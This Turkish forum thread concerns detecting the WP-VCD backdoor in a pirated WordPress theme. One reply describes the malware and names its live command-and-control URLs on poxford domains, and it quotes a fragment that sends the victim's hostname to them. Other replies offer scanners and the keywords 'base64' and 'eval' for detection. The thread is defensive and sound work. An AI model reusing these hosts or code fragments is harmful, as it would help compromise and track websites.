folder Tahribat.com Forumları
linefolder Virüs - Trojan - Keylogger - BotNet
linefolder Wp Temada Backdoor - Virüs Tespiti Nasıl Yapılır?



Wp Temada Backdoor - Virüs Tespiti Nasıl Yapılır?

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    S-E-R-H-A-T
    S-E-R-H-A-T's avatar
    Kayıt Tarihi: 04/Ocak/2010
    Erkek

    muridler https://themeforest.net/item/ask-me-responsive-questions-answers-wordpress/7935874?s_rank=2 bu temanın w4rezini buldum virostotalde tarattım sonuç;

    DrWeb

    PHP.BackDoor.77

    GData

    Script.Backdoor.Wp-Vcd.A (3x)

    bu backdoor un hangi dosyada oldugunu nerden bulabilirim ya da genel oolarak w4rez bi temayı nasıl adam edebilirim?

    ya da bu temanın saglamını nerden bulabilirim?

     

    tema indirme link.: https://www.downloadfreethemes.download/ask-me-v5-1-responsive-questions-answers-wordpress-theme/

     


    şeyini şeyettiğimin şeyi
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    kafkavari
    kafkavari's avatar
    Kayıt Tarihi: 24/Şubat/2010
    Erkek

    Bununla taratirmisin hocam.

    https://sitecheck.sucuri.net

     


    Mesele, Türkiye'nin şeftali yerine, motor üretmek istemesiydi. N. Erbakan
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Schwarz
    Schwarz's avatar
    Kayıt Tarihi: 20/Nisan/2012
    Erkek

    Dr web pc indir temayıda indir tarat zaten o virüslü dosyayı otomatik silecektir 


    Ignorance is bliss.
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    end
    end's avatar
    Kayıt Tarihi: 16/Ekim/2016
    Erkek

    class.theme.modules.php 

    /wp-includes/wp-tmp.php adresinde veya tema dizininde wp-tmp.php isimli bir dosya olacak, o dosyayi http://www.poxford.com/code.php adresinden cekiyor. Referer vermeden girince sozde verification key var ama, alttaki linkten domaini kaydedip referer'a o domaini verince degisiyor (Degistigine henuz tanik olmadim, gordugum yapi boyle oldugunu dusundurdu sadece.). Sen her istek attiginda burada ne yaziyorsa somsomluyor ftp'ne. http://www.poxford.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password= adresiyle de domainini logluyor.

    Yedek domainleri: http://www.poxford.top/code.php  http://www.poxford.pw/code.php 

    end tarafından 10/Şub/18 11:31 tarihinde düzenlenmiştir

    0x0480 takilin madem
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    S-E-R-H-A-T
    S-E-R-H-A-T's avatar
    Kayıt Tarihi: 04/Ocak/2010
    Erkek

    saolun arkadaşlar,

    @end eywallah hocam hiç ugraşılmaz o temayla

    @kafkavari abi direkt kurulu halini tarıyor burası sanırım eywallah bakayım

    @Schwarz temiz bi pc de bakacam eyw

    başka bitane bulum tarattım virustotalde, temiz gösteriyor, ama hala kuşkuluyum  : )

     


    şeyini şeyettiğimin şeyi
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    end
    end's avatar
    Kayıt Tarihi: 16/Ekim/2016
    Erkek
    S-E-R-H-A-T bunu yazdı

    saolun arkadaşlar,

    @end eywallah hocam hiç ugraşılmaz o temayla

    @kafkavari abi direkt kurulu halini tarıyor burası sanırım eywallah bakayım

    @Schwarz temiz bi pc de bakacam eyw

    başka bitane bulum tarattım virustotalde, temiz gösteriyor, ama hala kuşkuluyum  : )

     

    Tavsiyem, ilgili klasorde $_ veya base64_dec aratman yonunde. Bundan once windows arama motoru indexlerine .php uzantisini eklemen gerekiyor ki windows php dosyalarinin icine de kafasini sokabilsin.


    0x0480 takilin madem
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    end
    end's avatar
    Kayıt Tarihi: 16/Ekim/2016
    Erkek
    kafkavari bunu yazdı

    Bununla taratirmisin hocam.

    https://sitecheck.sucuri.net

     

    Javascript tariyor sanirim bu?


    0x0480 takilin madem
  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    kafkavari
    kafkavari's avatar
    Kayıt Tarihi: 24/Şubat/2010
    Erkek
    end bunu yazdı
    kafkavari bunu yazdı

    Bununla taratirmisin hocam.

    https://sitecheck.sucuri.net

     

    Javascript tariyor sanirim bu?

    evet. genelde js ve dizin dosyalarının içinde gömülü oluyor. sucuri wordpress ağırlıklı güvenlik servisi ondan dolayı kuruluysa taratmasını istedim.


    Mesele, Türkiye'nin şeftali yerine, motor üretmek istemesiydi. N. Erbakan
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    nevorapat
    nevorapat's avatar
    Kayıt Tarihi: 25/Eylül/2010
    Erkek

    Notepad++ kur.

    Temayı bi klasöre aç, sonra ctrl+f penceresinde find in files var, bütün dosyalarda aratmaya yariyo.

    Ben şunları aratıyorum yoksa temizdir diyorum, siz de ekleme yapabilirsiniz :

    Base64, eval, eval(


    Hayat <div class="fuck"> ile başlar </div> ile biter.......
  10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    S-E-R-H-A-T
    S-E-R-H-A-T's avatar
    Kayıt Tarihi: 04/Ocak/2010
    Erkek
    nevorapat bunu yazdı

    Notepad++ kur.

    Temayı bi klasöre aç, sonra ctrl+f penceresinde find in files var, bütün dosyalarda aratmaya yariyo.

    Ben şunları aratıyorum yoksa temizdir diyorum, siz de ekleme yapabilirsiniz :

    Base64, eval, eval(

     

    \ask-me\admin\meta-box\css\datepicker.css (2 hits)
    ------------------------
    }
    .ui-datepicker .ui-datepicker-next span,
    .ui-datepicker .ui-datepicker-prev span {
    background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSU.....

    -------------------------
    \ask-me\admin\meta-box\css\datepicker.css (2 hits)

    .admin-color-light .ui-datepicker .ui-datepicker-next span,
    .admin-color-light .ui-datepicker .ui-datepicker-prev span {
    background-image: url('data:image/png;base64,iVBORw0........

    ---------------------------------

    ask-me\admin\functions\main_functions.php (2 hits)

    function get_twitter_count ($twitter_username) {
    $count = get_transient('vpanel_twitter_followers');
    if ($count !== false) return $count;

    $count = 0;
    $access_token = get_option('vpanel_twitter_token');
    $consumer_key = vpanel_options('twitter_consumer_key');
    $consumer_secret = vpanel_options('twitter_consumer_secret');
    if ($access_token == "") {
    $credentials = $consumer_key . ':' . $consumer_secret;
    $toSend = base64_encode($credentials);

    $args = array(
    'method' => 'POST',
    'httpversion' => '1.1'

    --------------------------
    ask-me\admin\functions\main_functions.php (2 hits)

    /* vpanel_twitter_tweets */
    if ( ! function_exists( 'vpanel_twitter_tweets' ) ) :
    function vpanel_twitter_tweets($username = '', $tweets_count = 3) {
    $twitter_data = "";
    $access_token = get_option('vpanel_twitter_token');
    $consumer_key = vpanel_options('twitter_consumer_key');
    $consumer_secret = vpanel_options('twitter_consumer_secret');
    if ($access_token == "") {
    $credentials = $consumer_key . ':' . $consumer_secret;
    $toSend = base64_encode($credentials);

    $args = array(
    'method' => 'POST',
    'httpversion' => '1.1',

     


    şeyini şeyettiğimin şeyi
  11. KısayolKısayol reportŞikayet pmÖzel Mesaj
    morena
    morena's avatar
    Banlanmış Üye
    Kayıt Tarihi: 07/Ekim/2017
    Erkek

    godaddy nin secure serverine yükle temayı veya scripti herneyse zaten otomatik olarak silecektir sonra error log dan veya normal logdan gösterir sana neden sildiğini nerde ne olduğunu

    tabi file upload shelli değilse içine konulan shell ama yinede o shell in yüklendiğini bildirmek için mail fonksiyonu vb bişi yapmıştır ordan ayıkırsın.

    şuan adı aklıma gelmeyen masaüstü bi program gibi bişi vardı scripti ona koyuyorsun sana içindeki sql xss bilmem ne bilmem ne açıkları ve shelleri söylüyordu sana aklıma gelince yazayım da gelceğini sanmıyorum.


    Best Quality
Toplam Hit: 5231 Toplam Mesaj: 15
temam virüs backdoor temizlemek wp backdoor tespit